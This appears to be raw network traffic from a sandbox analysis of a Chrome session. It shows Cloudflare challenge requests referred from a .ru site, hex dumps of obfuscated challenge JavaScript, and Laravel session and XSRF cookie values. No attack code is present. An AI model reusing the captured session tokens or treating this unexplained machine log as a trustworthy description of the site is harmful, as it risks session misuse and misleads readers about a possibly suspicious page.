                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://7x8x.digitalvoyage.ru/xaxb/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IjloMEpHdU9aNTVxeWh2N01sNnh2Vnc9PSIsInZhbHVlIjoicU1NRnBHc3VhcUdNMkRET055RTlxSGMycDBKQjgwYkFTWXk5eEk4RSt4WENwaFV4L2loejFxUTJ1MWRCMERmRmR1VUFKcHlScEh4WVQ5SisxRHFzdnBqU0VtaHYyR0NYK0drMWEvSVJmamNINUJoRlhDM0xmTG5sZi9RYkdlbWMiLCJtYWMiOiJhN2M2YzQ1NDQxNzA4YjM1N2VkNzk1ZTc2ZGFjMWFlYTc0MzcwZjU1ZWQ0ODI2NDIyN2M0MTgwNDJjMjA2OGExIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImVlS0RUcnhwZ05Oa2RLZVJEVU9kS3c9PSIsInZhbHVlIjoiV0R3TXV0OGtQZjJKQzlnSGxpN0hIeXVQWHRDdkRQZzIzTklXU1QzWEYwZXJQMzkxelpaYUpYRlBnRTArR1Fld3l6NHV1aDV6ay9ubFRiVlVQd2pMMVFIRG1UUTBMYVFqSmd2SXVoSDVZR0x4Z29BbnJuV0g5RFlYVVc4alBNYU8iLCJtYWMiOiJhMmJjNDJmMjYyYzJiZTViNGExYmE2MzkxZTE1NDc0NDA5MGNmYWViNGFkYTdhNjhjNDhmODU2NGU4ZGYwMDM5IiwidGFnIjoiIn0%3D
                                                                                  2025-01-07 18:49:04 UTC1065INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 07 Jan 2025 18:49:04 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=14400
                                                                                  Age: 9275
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mS%2BSvftu%2FM9y10SgHt2G7NAeC0bqMj4hrxiWPGvuRdNCCnilPQ1Sanfz6Cb6zUOf6zIAiDT7U8Fld0hG92W3flQATbLyo8jx17Lsvpbg3E2BzBiXYc5DPgBkwgP0fQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Vary: Accept-Encoding
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1255&min_rtt=1230&rtt_var=370&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2276&delivery_rate=2217457&cwnd=250&unsent_bytes=0&cid=980e0f9051f545ea&ts=24&x=0"
                                                                                  CF-Cache-Status: HIT
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6202d0852c34f-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1912&min_rtt=1555&rtt_var=838&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1904&delivery_rate=1877813&cwnd=181&unsent_bytes=0&cid=06facd7bd082af8e&ts=3624&x=0"
                                                                                  2025-01-07 18:49:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.649752104.18.94.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:05 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:05 UTC240INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:05 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  cache-control: max-age=2629800, public
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6202eef8e422d-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:05 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.649753104.18.94.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:05 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6202638555e78&lang=auto HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:05 UTC331INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:05 GMT
                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                  Content-Length: 121370
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6202fea36430d-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:05 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70
                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcep
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61
                                                                                  Data Ascii: r%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","check_delays":"Verification%20is%20taking%20longer%20tha
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 66 4e 2c 66 59 2c 67 32 2c 67 33 2c 67 36 2c 67 37 2c 67 44 2c 67 48 2c 67 34 2c 67 35 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 35 31 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 33 36 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 33 33 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 32 31 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 33 33 35 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 38 32 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 32 37 35 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31
                                                                                  Data Ascii: fN,fY,g2,g3,g6,g7,gD,gH,g4,g5){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(851))/1+-parseInt(gI(1236))/2*(-parseInt(gI(733))/3)+-parseInt(gI(321))/4+parseInt(gI(335))/5*(parseInt(gI(582))/6)+parseInt(gI(275))/7+-parseInt(gI(11
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 28 38 31 36 29 5d 28 69 2c 44 29 29 3f 73 28 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 69 2b 44 2c 68 5b 44 5d 29 29 3a 6f 5b 67 58 28 31 30 31 33 29 5d 28 73 2c 69 2b 44 2c 45 29 3a 28 48 3d 78 5b 67 58 28 31 31 39 39 29 5d 5b 67 58 28 39 31 39 29 5d 5b 67 58 28 31 35 39 33 29 5d 28 67 58 28 31 33 38 32 29 29 2c 48 26 26 48 5b 67 58 28 31 30 33 32 29 5d 28 67 58 28 35 37 33 29 2c 66 75 6e 63 74 69 6f 6e 28 68 30 29 7b 68 30 3d 67 58 2c 48 5b 68 30 28 31 34 33 37 29 5d 5b 68 30 28 35 39 34 29 5d 3d 68 30 28 39 34 33 29 2c 48 28 68 30 28 31 32 30 30 29 2c 68 30 28 31 34 30 30 29 29 7d 29 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 67 59 29 7b 67 59 3d 67 58 2c 4f 62 6a 65 63 74 5b 67 59 28 38 30 31 29 5d 5b 67 59
                                                                                  Data Ascii: (816)](i,D))?s(i+D,E):F||s(i+D,h[D])):o[gX(1013)](s,i+D,E):(H=x[gX(1199)][gX(919)][gX(1593)](gX(1382)),H&&H[gX(1032)](gX(573),function(h0){h0=gX,H[h0(1437)][h0(594)]=h0(943),H(h0(1200),h0(1400))})),C++);return j;function s(G,H,gY){gY=gX,Object[gY(801)][gY
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 28 65 4d 5b 68 34 28 31 32 33 31 29 5d 5b 68 34 28 31 30 31 36 29 5d 28 29 2c 65 4d 5b 68 34 28 31 32 33 31 29 5d 5b 68 34 28 33 33 31 29 5d 28 29 2c 65 4d 5b 68 34 28 31 36 32 30 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 68 34 28 31 35 32 39 29 5d 5b 68 34 28 39 38 32 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 68 34 28 38 39 35 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 34 28 31 31 39 39 29 5d 5b 68 34 28 31 33 35 30 29 5d 2c 27 65 76 65 6e 74 27 3a 68 34 28 39 32 38 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 34 28 31 31 39 39 29 5d 5b 68 34 28 31 36 37 30 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 34 28 31 31 39 39 29 5d 5b 68 34 28 39 36 35 29 5d 2c 27 63 6f 64 65 27 3a 65 5b 68 34 28 32 38 33 29 5d 2c 27 72 63 56 27 3a 65 4d
                                                                                  Data Ascii: (eM[h4(1231)][h4(1016)](),eM[h4(1231)][h4(331)](),eM[h4(1620)]=!![],eM[h4(1529)][h4(982)]({'source':e[h4(895)],'widgetId':eM[h4(1199)][h4(1350)],'event':h4(928),'cfChlOut':eM[h4(1199)][h4(1670)],'cfChlOutS':eM[h4(1199)][h4(965)],'code':e[h4(283)],'rcV':eM
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 28 6b 5b 68 35 28 31 34 39 31 29 5d 28 6b 5b 68 35 28 31 34 30 34 29 5d 28 27 76 5f 27 2b 65 4d 5b 68 35 28 31 31 39 39 29 5d 5b 68 35 28 33 36 38 29 5d 2c 27 3d 27 29 2c 46 29 29 7d 63 61 74 63 68 28 47 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 31 36 35 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 68 36 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 76 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 68 36 3d 67 4a 2c 66 3d 7b 7d 2c 66 5b 68 36 28 36 38 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3e 76 7d 2c 66 5b 68 36 28 33 31 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3e 3e 76 7d 2c 66 5b 68 36 28 37 37 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 7c 73 7d 2c 66 5b 68 36 28 31 33 31
                                                                                  Data Ascii: (k[h5(1491)](k[h5(1404)]('v_'+eM[h5(1199)][h5(368)],'='),F))}catch(G){}},eM[gJ(1651)]=function(e,h6,f,g,h,i,j,k,v,l,m,n,o){(h6=gJ,f={},f[h6(687)]=function(s,v){return s>v},f[h6(314)]=function(s,v){return s>>v},f[h6(777)]=function(s,v){return v|s},f[h6(131
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 5b 68 38 28 31 32 38 30 29 5d 28 68 38 28 32 36 39 29 2c 65 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 66 30 3d 30 2c 66 33 3d 7b 7d 2c 66 33 5b 67 4a 28 39 35 31 29 5d 3d 66 32 2c 65 4d 5b 67 4a 28 31 35 39 35 29 5d 3d 66 33 2c 66 35 3d 65 4d 5b 67 4a 28 31 31 39 39 29 5d 5b 67 4a 28 39 39 33 29 5d 5b 67 4a 28 36 37 36 29 5d 2c 66 36 3d 65 4d 5b 67 4a 28 31 31 39 39 29 5d 5b 67 4a 28 39 39 33 29 5d 5b 67 4a 28 31 36 33 30 29 5d 2c 66 37 3d 65 4d 5b 67 4a 28 31 31 39 39 29 5d 5b 67 4a 28 39 39 33 29 5d 5b 67 4a 28 31 34 30 37 29 5d 2c 66 6a 3d 21 5b 5d 2c 66 76 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 31 30 33 32 29 5d 28 67 4a 28 31 37 30 34 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 69 31 2c 64 2c 65 2c 67 2c 68 29 7b 28 69 31 3d 67 4a 2c 64 3d 7b
                                                                                  Data Ascii: [h8(1280)](h8(269),e));return![]},f0=0,f3={},f3[gJ(951)]=f2,eM[gJ(1595)]=f3,f5=eM[gJ(1199)][gJ(993)][gJ(676)],f6=eM[gJ(1199)][gJ(993)][gJ(1630)],f7=eM[gJ(1199)][gJ(993)][gJ(1407)],fj=![],fv=undefined,eM[gJ(1032)](gJ(1704),function(c,i1,d,e,g,h){(i1=gJ,d={
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 31 33 36 38 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 37 33 5d 5b 31 5d 5b 69 41 28 31 34 38 31 29 5d 28 74 68 69 73 2e 68 5b 63 5b 69 41 28 36 35 37 29 5d 28 31 37 33 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2d 39 38 2c 32 35 36 29 2c 32 35 35 29 2c 68 3d 63 5b 69 41 28 36 35 37 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 37 33 2e 38 33 5d 5b 33 5d 2c 31 35 38 2b 74 68 69 73 2e 68 5b 63 5b 69 41 28 36 36 38 29 5d 28 31 37 33 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 69 41 28 31 34 38 31 29 5d 28 74 68 69 73 2e 68 5b 63 5b 69 41 28 31 31 39 32 29 5d 28 31 37 33 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 26 32 35 35 2e 31 32 29 2c 63 5b 69 41 28 33 30 33 29 5d 28 32 34 2c 68 29 3f 28 69 3d 63 5b 69 41 28 34 38 39 29 5d 28 67 2c 35
                                                                                  Data Ascii: 1368)](this.h[this.g^173][1][iA(1481)](this.h[c[iA(657)](173,this.g)][0]++)-98,256),255),h=c[iA(657)](this.h[this.g^173.83][3],158+this.h[c[iA(668)](173,this.g)][1][iA(1481)](this.h[c[iA(1192)](173,this.g)][0]++)&255.12),c[iA(303)](24,h)?(i=c[iA(489)](g,5
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 6a 5b 69 43 28 31 34 38 31 29 5d 28 6d 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 73 3d 66 5b 69 43 28 31 34 30 31 29 5d 28 69 43 28 38 34 33 29 29 2c 73 5b 69 43 28 33 33 36 29 5d 3d 67 2c 73 5b 69 43 28 31 33 33 31 29 5d 5b 69 43 28 31 32 38 32 29 5d 28 69 43 28 31 34 32 31 29 29 2c 68 5b 69 43 28 31 31 39 39 29 5d 5b 69 43 28 39 31 39 29 5d 5b 69 43 28 31 35 30 32 29 5d 28 66 5b 69 43 28 31 32 31 39 29 5d 29 5b 69 43 28 36 39 39 29 5d 28 73 29 2c 73 7d 29 2c 63 3d 65 4d 5b 69 42 28 31 34 35 38 29 5d 28 63 29 2c 69 3d 5b 5d 2c 67 3d 2d 31 3b 21 66 5b 69 42 28 37 37 39 29 5d 28 69 73 4e 61 4e 2c 6b 3d 63 5b 69 42 28 31 34 38 31 29 5d 28 2b 2b 67 29 29 3b 69 5b 69 42 28 34 32 38 29 5d 28 53 74 72 69 6e 67 5b 69 42 28 31 34 37 36 29 5d 28 28 66 5b 69 42 28
                                                                                  Data Ascii: j[iC(1481)](m);else return s=f[iC(1401)](iC(843)),s[iC(336)]=g,s[iC(1331)][iC(1282)](iC(1421)),h[iC(1199)][iC(919)][iC(1502)](f[iC(1219)])[iC(699)](s),s}),c=eM[iB(1458)](c),i=[],g=-1;!f[iB(779)](isNaN,k=c[iB(1481)](++g));i[iB(428)](String[iB(1476)]((f[iB(
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 59 4b 50 59 43 27 3a 6a 47 28 31 37 31 31 29 2c 27 48 55 7a 6a 41 27 3a 6a 47 28 33 36 34 29 2c 27 53 64 65 73 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 73 5a 72 75 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 72 63 54 62 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 4f 6a 47 58 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4b 6d 55 49 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 50 64 72 69 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29
                                                                                  Data Ascii: :function(h,i){return h===i},'YKPYC':jG(1711),'HUzjA':jG(364),'Sdesz':function(h,i){return h(i)},'sZrun':function(h,i){return i|h},'rcTbh':function(h,i){return h<i},'OjGXC':function(h,i){return h-i},'KmUIr':function(h,i){return h<<i},'Pdrix':function(h,i)


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.649755104.18.95.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:05 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2126003918:1736274592:yhHrOMcq_yWVDdXkB-uSkPp0ozwhPwfQV3b4Q4T8_y4/8fe6202638555e78/b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 3215
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  CF-Chl-RetryAttempt: 0
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:05 UTC3215OUTData Raw: 76 5f 38 66 65 36 32 30 32 36 33 38 35 35 35 65 37 38 3d 79 4e 32 4f 5a 4f 24 4f 6e 4f 67 4f 70 48 78 36 48 78 37 4f 48 50 44 72 77 75 48 2d 78 77 39 6d 78 68 37 78 6b 53 47 6b 36 66 77 78 44 50 77 72 30 47 66 24 78 37 78 32 50 48 38 6b 33 78 69 47 78 72 30 54 38 4f 2d 30 78 65 4f 48 30 38 48 31 64 25 32 62 6b 38 78 34 4f 64 64 4b 78 42 47 78 6e 42 78 32 50 6b 68 78 77 47 78 6c 78 2b 70 2d 52 34 73 7a 4a 4c 30 78 6d 4f 66 76 37 78 61 75 59 32 78 4d 6d 53 6b 39 54 52 59 65 45 4d 79 70 6f 67 46 30 59 61 32 78 74 53 46 6c 68 57 42 61 78 2b 34 53 76 4f 70 32 71 49 31 50 70 71 33 75 4b 49 31 51 70 48 6b 68 67 57 61 58 45 53 50 78 4e 4f 78 24 78 77 32 72 43 78 48 6c 78 39 2b 51 54 43 36 41 78 64 6d 24 6c 48 53 78 68 6e 2b 4f 54 66 76 66 79 4f 6b 4b 78 78 46 58
                                                                                  Data Ascii: v_8fe6202638555e78=yN2OZO$OnOgOpHx6Hx7OHPDrwuH-xw9mxh7xkSGk6fwxDPwr0Gf$x7x2PH8k3xiGxr0T8O-0xeOH08H1d%2bk8x4OddKxBGxnBx2PkhxwGxlx+p-R4szJL0xmOfv7xauY2xMmSk9TRYeEMypogF0Ya2xtSFlhWBax+4SvOp2qI1Ppq3uKI1QpHkhgWaXESPxNOx$xw2rCxHlx9+QTC6Axdm$lHSxhn+OTfvfyOkKxxFX
                                                                                  2025-01-07 18:49:05 UTC775INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:05 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Content-Length: 163240
                                                                                  Connection: close
                                                                                  cf-chl-gen: 640bemIyZfLtZqgoN4pxBc4lKrFnqZ7Xguu8pYWlF9mBDAcdeAHbFcTFtohqku8ACHMm6IAQY2RroJy3zC/jrlaTWKhLSJw+Y+s6QVEbS54JZy5DiOC5NThkZhXIv4vSvoO9El/LWzlpUMn/w17IDOVV7V2lZaePlfywBXS3ny706oXb5NK4t3EJzz2sHBm/tpEKI9GQWlil8668uyrzJLWJ5kle+EE4Rm21gQOxOfJpAANJ3k/fsjFvQQeTIwihLj8i4Qt1m3dLW9cuyMvo2bzHyn/Y8BLfQaFNjHEJBlHtAr/u9ktsMCHm6xe7D6x6We9EFE4ay5lH56p/Rl7l1F5ZcT7xDkMPtvBpA9Ei4PpHlua2HTwtv3sxXtiReZZ/hWVSdvPmM/RRVjKI8Sykj/qhPzZNA1x3JNE9TJachsv+OJXz8eefyDruvlYSjryU3h0bmm+EfUTSII85T87iprUutASIdKrukd6EHXp/csMdvfvOyP2aaWtQAMxHJmOlEg9SdHSmEXY9$P98/rWxB63tgjpkB
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe62030892f7292-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:05 UTC594INData Raw: 64 6c 71 49 52 6f 42 4b 54 49 47 47 63 6e 78 77 69 35 4a 4a 62 59 6c 37 54 59 71 52 6c 6d 31 78 6f 6d 32 57 63 33 61 58 64 36 4e 38 6d 5a 61 72 6a 6e 74 33 5a 70 43 51 6b 49 4f 66 68 59 68 33 68 71 6d 35 75 5a 71 2f 71 5a 4f 55 65 5a 4f 34 73 4a 6d 77 6e 38 4b 72 75 34 50 45 6f 4a 32 35 6a 63 37 55 76 38 79 57 71 71 37 61 72 39 43 32 6c 73 6d 79 72 2b 4c 65 75 62 44 47 72 36 65 6a 79 63 6a 49 34 73 33 4d 7a 4f 7a 62 35 73 44 7a 34 4f 76 74 74 37 43 34 36 4e 6d 38 30 77 45 43 76 75 2f 52 34 76 6a 62 2b 77 59 4c 33 2b 72 37 79 4f 4c 75 41 4d 77 4f 44 67 54 67 79 42 45 53 79 2b 6f 51 47 2b 7a 72 32 67 76 64 33 66 77 65 35 41 45 66 39 2f 6f 49 41 52 34 4d 2b 79 73 64 45 52 41 6a 4d 78 4d 45 46 52 41 44 4e 53 51 4a 50 55 44 33 47 7a 73 65 4e 45 4d 56 46 44 63
                                                                                  Data Ascii: dlqIRoBKTIGGcnxwi5JJbYl7TYqRlm1xom2Wc3aXd6N8mZarjnt3ZpCQkIOfhYh3hqm5uZq/qZOUeZO4sJmwn8Kru4PEoJ25jc7Uv8yWqq7ar9C2lsmyr+LeubDGr6ejycjI4s3MzOzb5sDz4Ovtt7C46Nm80wECvu/R4vjb+wYL3+r7yOLuAMwODgTgyBESy+oQG+zr2gvd3fwe5AEf9/oIAR4M+ysdERAjMxMEFRADNSQJPUD3GzseNEMVFDc
